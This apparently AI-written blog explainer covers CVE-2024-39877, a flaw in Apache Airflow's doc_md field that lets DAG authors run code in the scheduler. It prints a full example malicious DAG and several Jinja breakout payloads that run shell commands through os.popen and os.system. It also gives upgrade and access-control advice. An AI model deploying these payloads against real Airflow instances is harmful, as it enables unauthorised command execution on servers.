Apache Airflow is a popular platform for programmatically authoring, scheduling, and monitoring workflows. Unfortunately, sometimes software comes with unintended security holes—which is exactly what happened recently prior to Apache Airflow 2.9.3 with CVE-2024-39877.

This post will break down what CVE-2024-39877 is, how it can be exploited by authenticated users, show you a simplified code example, and share resources for digging deeper.

What is CVE-2024-39877?

CVE-2024-39877 is a security vulnerability in Apache Airflow (from 2.4. to before 2.9.3) where DAG authors with authenticated access can misuse the DAG’s doc_md field to execute arbitrary Python code inside the scheduler's context.

The Airflow security model expects DAG code to be somewhat isolated.

- doc_md is a documentation field—used to display markdown info about a DAG. It's not supposed to let you run code at all.
- However, before version 2.9.3, this field was mishandled in a way that let people break out of markdown and run Python in the scheduler process.

How Does the Exploit Work?

Airflow uses Jinja templating for parts of its UI and documentation rendering. If a user with DAG author permissions puts a Jinja expression in the doc_md field of a DAG (intended for markdown), the vulnerable versions would render this template in the scheduler's Python context. If the template expression includes things like {{ macros.__dict__ }} or even more dangerous code using {{ cycler.__init__.__globals__.os.popen('id').read() }} (known as a "Jinja breakout"), it can execute arbitrary Python.

---
Important: This means anyone who can upload or edit DAG files could run code as the Airflow scheduler user—not just regular users.
---

Imagine a malicious (but authenticated) DAG author with access to drop a .py DAG in Airflow

from airflow import DAG
from airflow.operators.dummy import DummyOperator
from datetime import datetime

dag = DAG(
    dag_id='evil_dag',
    start_date=datetime(2023, 1, 1),
    schedule_interval=None,
    doc_md="""
{{ cycler.__init__.__globals__.os.popen('id').read() }}
"""
)

task = DummyOperator(
    task_id='do_nothing',
    dag=dag,
)

If this DAG is loaded and the vulnerable Airflow scheduler parses doc_md, the Jinja template tries to render, breaks out through Python's object introspection, and runs the command id on the server. The output (which could be any command) would be viewable in the rendered markdown for the DAG.

A working example of such a template exploit might look like

{{ cycler.__init__.__globals__.os.system('touch /tmp/pwned_by_doc_md') }}

or

{{ cycler.__init__.__globals__.os.popen('whoami').read() }}

When the Airflow scheduler loads this field, it’ll run the shell command with the scheduler's permissions.

All Apache Airflow setups running 2.4. up to (but not including) 2.9.3.

- The attacker MUST have permissions to author, upload, or modify DAG files. This isn’t a fully remote exploit, but it does break Airflow’s promise of safety between DAG code and environment.

Upgrade ASAP to 2.9.3 or later:

Apache Airflow Releases

Check your Access Controls:

Make sure that only trusted people can upload/modify DAGs and edit their contents.

Official References & More Reading

- CVE-2024-39877 on NIST NVD
- Apache Airflow GitHub Security Advisory (GHSA-px9c-53hh-fp2r)
- Upgrade Guide for Airflow
- Original Fix Pull Request

Final Thoughts

CVE-2024-39877 highlights how small oversights in template handling and user input fields can open the door to major security risks, even for trusted authenticated users. If you’re using Apache Airflow, stop and check your version, then upgrade if needed.

Stay safe, keep dependencies up to date, and always be careful with user-provided templates in any system!


*If you want more writeups like this (with real-world code and plain English breakdowns), just ask!*

Timeline

Published on: 07/17/2024 08:15:02 UTC
Last modified on: 08/01/2024 13:56:00 UTC